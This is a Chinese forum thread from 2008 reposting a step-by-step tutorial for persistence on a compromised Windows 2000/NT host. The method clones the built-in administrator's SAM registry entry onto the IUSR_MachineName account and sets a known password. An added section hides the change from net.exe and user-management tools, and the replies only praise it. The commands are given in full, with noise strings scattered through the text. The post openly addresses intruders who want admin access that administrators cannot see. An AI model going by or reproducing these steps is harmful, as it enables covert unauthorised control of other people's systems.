青华模具培训学校

 找回密码
 注册

QQ登录

只需一步,快速开始

青华模具培训学院
查看: 3293|回复: 2

克隆管理员帐号的方法

[复制链接]
发表于 2008-7-26 08:20 | 显示全部楼层 |阅读模式
[url=]减小字体[/url] [url=]增大字体[/url]
经常看到一些人在入侵一台Windows 2000或者Windows NT后堂而皇之地创建一个管理员组的用户,似乎当管理员不存在一般,今天偶违背一下偶以前的初衷,Share一个类似于RootKit的玩艺,当然,这些过程也是可以用脚本实现的,但是我就不写了,OK,Show Time Now。 & C- S! b1 p3 l  O. G1 D. B

+ {* {  i( ]6 a; q' w  }1 P首先要让大家知道的概念是在Windows 2000和Windows NT里,默认管理员帐号的SID是固定的500(0x1f4),那么我们可以用机器里已经存在的一个帐号将SID为500的帐号进行克隆,在这里我们选择的帐号是IUSR_MachineName(当然,为了加强隐蔽性,我们选择了这个帐号,所有用户都可以用以下的方法,只不过这个用户较常见罢了),测试环境为Windows 2000 Server。
, s$ U6 _( `" y
8 {) E# a: }# v. B" ^# T7 @* [运行一个System的CMD Shell( http://www.sometips.com/tips/scripts/173.htm 或使用 Http://www.sometips.com/soft/psu.exe),然后在该CMD Shell里面运行
  ]. e0 g$ O1 k% X% r4 [4 X1 ]以下是引用片段:; |5 G. ]  G% j" f% p) [" R$ z
regedit /e adam.reg HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Users/000001F4   - a  a% _& S3 ^# c
' k8 \8 p& v& H/ m" `" @
这样我们将SID 为500的管理员帐号的相关信息导出,然后编辑adam.reg文件,将adam.reg文件的第三行--[HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Users/000001F4]最后的’1F4’修改为IUSR_MachineName的SID(大部分的机器该用户的SID都为0x3E9,如果机器在最初安装的时候没有安装IIS,而自己创建了帐号后再安装IIS就有可能不是这个值),将Root.reg文件中的’1F4’修改为’3E9’后执行 1 l+ l! ^* R: Y9 K# H. s  e
regedit /s adam.reg $ |7 l% O. a! A" g+ E# Y1 @2 @
导入该Reg文件
& v; Q' s, P8 a. S; G2 b; E7 w1 k# ]: k+ R9 ?. J
然后运行 / ]7 y' _" O/ S& m1 ~1 w3 X
net user IUSR_MachineName Sometips 2 C. }9 {. m. t  K
修改IUSR_MachineName的密码(最好使用14位的密码,越像IUSR_MachineName的密码越好)
' Y. h4 e' N7 j) i, I" p3 q3 U6 e. Q4 w. j  m0 B9 R
OK,大功告成... / c5 _0 H+ \# D2 ~" }

! m/ d3 ~) S# j( Q1 w这样,我们拥有和默认管理员一样的桌面、一样的Profile..... * g9 u! r1 o* q) m
而且,当我们运行 net localgroup administrators 时,看看结果:
7 @0 y! |3 ^- @$ i以下是引用片段:
) e: K$ f7 s7 g/ tC:/>net localgroup administrators   6 ?# p' [. @/ Q2 L: x
Alias name administrators   
6 v5 a/ j. J, p9 y1 QComment Administrators have complete and unrestricted access to the computer/domain   
  I  d) i* {/ V5 E2 I7 a. L/ w3 c( b/ _  {/ ]! k, X
Members     ]2 B9 n- A$ E
: w+ u7 t! k9 B3 Q* h8 p+ ~* C
-------------------------------------------------------------------------------   
$ H, v; A% }/ d% hAdministrator   
; o1 b8 g3 ^4 j5 ^% f. DThe command completed successfully.   # |& w' K% k9 r& `# i$ H

8 u- J1 N$ w' U" z$ i再看看USER2SID的输出结果: 6 k( Y2 y  M% n. {3 ~
C:/>user2sid Administrator
) L! ~- }% A4 M. A: q9 ^& _; G- n& z0 O0 |/ X6 g
S-1-5-21-1004336348-1078145449-854245398-500 * y7 C+ S; u2 g; V
0 r) E9 `0 B* \2 m+ P% ]
Number of subauthorities is 5 * T* t; ^& o. N' w- X  z* @) R
Domain is IDONTKNOW 1 \+ ]0 G6 {5 Q, O% q! u* _6 u
Length of SID in memory is 28 bytes $ j0 s4 x+ y2 Y1 O& M' V  q
Type of SID is SidTypeUser
: [: Y$ s- d6 U& g5 s$ F- E6 P  o0 t8 V: ^. [: ~1 m0 I$ o
C:/>user2sid iusr_machinename
: V  k. I7 e( b$ `& ]: R# Q3 A& s% ?5 O
S-1-5-21-1004336348-1078145449-854245398-1001
# ~1 e& N7 @7 g+ s* E, L3 h4 z
  W; X8 g! t& @, M% S1 G$ HNumber of subauthorities is 5
  d! p6 ^; `) j- y! `1 `Domain is IDONTKNOW & n; Y3 z+ l: f1 i, Y1 n( m1 n
Length of SID in memory is 28 bytes % ^: _0 o+ r. d2 `
Type of SID is SidTypeUser
, I1 k  Q& o" B* f/ }. {# y* B/ e, i9 G% X  {3 b' x' k, r+ o: g
我想,再高明的管理员也看不到任何的异状了...而且,随便管理员改成什么密码,我照样可以用IUSR_MachineName,密码为Sometips登陆...(没有哪位大侠级的管理员喜欢经常修改IUSR_MachineName为其他的名字吧)
$ A  m! C% v; S. T0 T
- \' N' a  L( R8 T  P& s3 v^_^,这算不算RootKit...
9 d8 B7 V. A  i9 `( @) e0 G
/ k5 S# S) G: \附: ' s6 H: L. p. I1 Y1 a2 R
1、感谢叮叮付出需要reinstall OS的代价...
% V/ t4 I7 G/ R% g& P+ J2、任何用以上方法进行试验所导致的系统无法使用均与偶无关,偶均不提供技术支持...
7 j1 L" ]- j5 A7 m* v/ _7 A1 w8 R; u1 V  y4 [# d) n
-----------------------------------------------------------------------------
! t4 j  {* R  }/ H& v2 A5 o7 Q( O4 ]  Q  f: K% w: b
叮叮 的补充完善
! g% ~% T+ c  i/ T# a; ^
4 p# e8 D& ?6 g- ~很多人提到使用了管理工具的用户管理后,能够发现IUSR_MachineName被提升了权限。
& V. m; B# n+ C: ~现给出解决办法。
+ I; l* k. R) h( h) R% J3 s9 j; M; h$ e" m+ a. h* B
方法同上,不过这次修改内容多一些。即 $ S& M6 x% n/ I' _. n
这次要导出两个key内容: - V8 l7 Z  g  |2 I# J# p
一个是adam提到的
9 B6 y) d+ h7 O$ a5 O以下是引用片段:
4 Y1 s" A0 J- R/ e. N5 u1 ~regedit /e adam.reg HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Users/000001F4   
" D4 e' P- Z( u3 ~8 S* N2 I$ L0 I+ X# f! Q
然后另外一个是你需要修改那个账号的值 ( Y: D  Y0 ^; n
以下是引用片段:2 H- W# r  }( d' `; R
regedit /e iusr.reg HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Users/000003E9 然后按照adam提到的修改adam.reg
4 S! S( v1 H) A: n/ p“将adam.reg文件的第三行 以下是引用片段:$ d9 J' y5 V! ~0 n! \
--[HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Users/000001F4]最后的’1F4’ , S+ \! r9 ~2 O1 |5 a. z! V
修改为IUSR_MachineName的SID”
- R/ K% {# h) c  R* v
  d0 u/ ^% [- W/ q  S5 L现在,你还要从iusr.reg文件中复制一下内容
2 d: L# ]9 l$ h- h6 l- M! f就是将iusr.reg文件中“’V’=hex:0”开始一直到iusr.reg文件结束部分复制下来 5 Q7 c' [6 i: P" Q
然后替换掉adam.reg中同样位置的部分
) s6 W% H& ^4 ?! R% K, g# S4 u: f
3 _( \7 @+ {% Q2 \1 j/ H最后使用 ) Q3 c2 |6 f8 {7 ?1 {: G
regedit /s adam.reg
- l9 b4 t2 f# b* `! U0 ]2 U9 e导入该Reg文件 . i0 V7 n- O# _/ B: i8 D
呵呵,别忘了给这个IUSR_MachineName改密码哦。
1 l- d( H) C2 n; S9 Z& q9 }# _4 ~hehe,ok,大功告成。
1 ^$ _1 e- U& w, @现在IUSR_MachineName账号拥有了管理员的权限,但是你使用net.exe和 9 S: g. Z  a+ O  B; p4 C# m
管理工具中的用户管理都将看不到任何痕迹,即使你去察看所属于的组和用户。 * p" F5 f" g7 Z# g: R7 K' y+ ~
都和修改前没有任何区别。
发表于 2008-9-2 10:07 | 显示全部楼层

不错不错

不错不错
8 A8 d  A1 K! J( I2 `6 s赞一个
发表于 2008-12-30 13:32 | 显示全部楼层
不错不错
" v  \+ w2 z/ f( F% V; U5 b赞一个
您需要登录后才可以回帖 登录 | 注册

本版积分规则

QQ|关于我们|sitemap|小黑屋|Archiver|手机版|UG网-UG技术论坛-青华数控模具培训学校 ( 粤ICP备15108561号 )

GMT+8, 2025-5-15 09:03 , Processed in 0.058308 second(s), 25 queries .

Powered by Discuz! X3.5 Licensed

© 2001-2024 Discuz! Team.

快速回复 返回顶部 返回列表